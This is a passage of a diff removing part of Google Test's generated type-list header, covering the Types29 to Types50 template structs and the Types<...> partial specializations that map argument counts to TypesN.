-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29>
-struct Types29 {
-  typedef T1 Head;
-  typedef Types28<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30>
-struct Types30 {
-  typedef T1 Head;
-  typedef Types29<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31>
-struct Types31 {
-  typedef T1 Head;
-  typedef Types30<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32>
-struct Types32 {
-  typedef T1 Head;
-  typedef Types31<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33>
-struct Types33 {
-  typedef T1 Head;
-  typedef Types32<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34>
-struct Types34 {
-  typedef T1 Head;
-  typedef Types33<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35>
-struct Types35 {
-  typedef T1 Head;
-  typedef Types34<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36>
-struct Types36 {
-  typedef T1 Head;
-  typedef Types35<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37>
-struct Types37 {
-  typedef T1 Head;
-  typedef Types36<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38>
-struct Types38 {
-  typedef T1 Head;
-  typedef Types37<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39>
-struct Types39 {
-  typedef T1 Head;
-  typedef Types38<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40>
-struct Types40 {
-  typedef T1 Head;
-  typedef Types39<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41>
-struct Types41 {
-  typedef T1 Head;
-  typedef Types40<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42>
-struct Types42 {
-  typedef T1 Head;
-  typedef Types41<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43>
-struct Types43 {
-  typedef T1 Head;
-  typedef Types42<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42,
-      T43> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44>
-struct Types44 {
-  typedef T1 Head;
-  typedef Types43<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-      T44> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45>
-struct Types45 {
-  typedef T1 Head;
-  typedef Types44<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-      T44, T45> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46>
-struct Types46 {
-  typedef T1 Head;
-  typedef Types45<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-      T44, T45, T46> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47>
-struct Types47 {
-  typedef T1 Head;
-  typedef Types46<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-      T44, T45, T46, T47> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48>
-struct Types48 {
-  typedef T1 Head;
-  typedef Types47<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-      T44, T45, T46, T47, T48> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48, typename T49>
-struct Types49 {
-  typedef T1 Head;
-  typedef Types48<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-      T44, T45, T46, T47, T48, T49> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48, typename T49, typename T50>
-struct Types50 {
-  typedef T1 Head;
-  typedef Types49<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-      T44, T45, T46, T47, T48, T49, T50> Tail;
-};
-
-
-}  // namespace internal
-
-// We don't want to require the users to write TypesN<...> directly,
-// as that would require them to count the length.  Types<...> is much
-// easier to write, but generates horrible messages when there is a
-// compiler error, as gcc insists on printing out each template
-// argument, even if it has the default value (this means Types<int>
-// will appear as Types<int, None, None, ..., None> in the compiler
-// errors).
-//
-// Our solution is to combine the best part of the two approaches: a
-// user would write Types<T1, ..., TN>, and Google Test will translate
-// that to TypesN<T1, ..., TN> internally to make error messages
-// readable.  The translation is done by the 'type' member of the
-// Types template.
-template <typename T1 = internal::None, typename T2 = internal::None,
-    typename T3 = internal::None, typename T4 = internal::None,
-    typename T5 = internal::None, typename T6 = internal::None,
-    typename T7 = internal::None, typename T8 = internal::None,
-    typename T9 = internal::None, typename T10 = internal::None,
-    typename T11 = internal::None, typename T12 = internal::None,
-    typename T13 = internal::None, typename T14 = internal::None,
-    typename T15 = internal::None, typename T16 = internal::None,
-    typename T17 = internal::None, typename T18 = internal::None,
-    typename T19 = internal::None, typename T20 = internal::None,
-    typename T21 = internal::None, typename T22 = internal::None,
-    typename T23 = internal::None, typename T24 = internal::None,
-    typename T25 = internal::None, typename T26 = internal::None,
-    typename T27 = internal::None, typename T28 = internal::None,
-    typename T29 = internal::None, typename T30 = internal::None,
-    typename T31 = internal::None, typename T32 = internal::None,
-    typename T33 = internal::None, typename T34 = internal::None,
-    typename T35 = internal::None, typename T36 = internal::None,
-    typename T37 = internal::None, typename T38 = internal::None,
-    typename T39 = internal::None, typename T40 = internal::None,
-    typename T41 = internal::None, typename T42 = internal::None,
-    typename T43 = internal::None, typename T44 = internal::None,
-    typename T45 = internal::None, typename T46 = internal::None,
-    typename T47 = internal::None, typename T48 = internal::None,
-    typename T49 = internal::None, typename T50 = internal::None>
-struct Types {
-  typedef internal::Types50<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41, T42, T43, T44, T45, T46, T47, T48, T49, T50> type;
-};
-
-template <>
-struct Types<internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types0 type;
-};
-template <typename T1>
-struct Types<T1, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types1<T1> type;
-};
-template <typename T1, typename T2>
-struct Types<T1, T2, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types2<T1, T2> type;
-};
-template <typename T1, typename T2, typename T3>
-struct Types<T1, T2, T3, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types3<T1, T2, T3> type;
-};
-template <typename T1, typename T2, typename T3, typename T4>
-struct Types<T1, T2, T3, T4, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types4<T1, T2, T3, T4> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5>
-struct Types<T1, T2, T3, T4, T5, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types5<T1, T2, T3, T4, T5> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6>
-struct Types<T1, T2, T3, T4, T5, T6, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types6<T1, T2, T3, T4, T5, T6> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7>
-struct Types<T1, T2, T3, T4, T5, T6, T7, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types7<T1, T2, T3, T4, T5, T6, T7> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types8<T1, T2, T3, T4, T5, T6, T7, T8> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types9<T1, T2, T3, T4, T5, T6, T7, T8, T9> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types10<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types11<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types12<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types13<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types14<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
